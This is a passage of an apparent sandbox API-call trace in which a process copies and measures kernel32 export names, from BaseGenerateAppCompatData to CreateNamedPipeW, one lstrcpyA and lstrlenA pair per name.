(in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.130] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.130] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.130] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.130] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.130] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.130] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.131] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.131] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.131] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.131] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.131] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.131] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.131] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.131] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.131] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.131] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.131] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.131] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.131] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.131] lstrlenA (lpString="BEEP") returned 4 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.131] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.131] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.131] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.131] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.131] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.131] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.132] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.132] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.132] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.132] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.132] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.132] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.132] lstrlenA (lpString="CANCELIO") returned 8 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.132] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.132] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.132] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.132] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.132] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.132] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.132] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.132] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.132] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.132] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.132] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.132] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.132] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.133] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.133] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.133] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.133] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.133] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.133] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.133] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.133] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.133] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.133] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.133] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.133] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.134] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.134] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.134] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.134] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.134] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.134] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.134] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.134] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.134] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.134] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.134] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.134] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.134] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.134] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.134] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.134] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.134] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.134] lstrlenA (lpString="COPYFILEA") returned 9 [0080.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.134] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.135] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.135] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.135] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.135] lstrlenA (lpString="COPYFILEW") returned 9 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.135] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.135] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.135] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.135] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.135] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.135] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.135] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.135] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.135] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.135] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.135] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.135] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.135] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.135] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.135] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.136] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.136] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.136] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.136] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.136] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.136] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.136] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.136] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.136] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.136] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.136] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.136] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.136] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.136] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.136] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.136] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.136] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.136] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.137] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.137] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.137] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.137] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.137] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.137] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.137] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.137] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.137] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.137] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.137] lstrcpyA 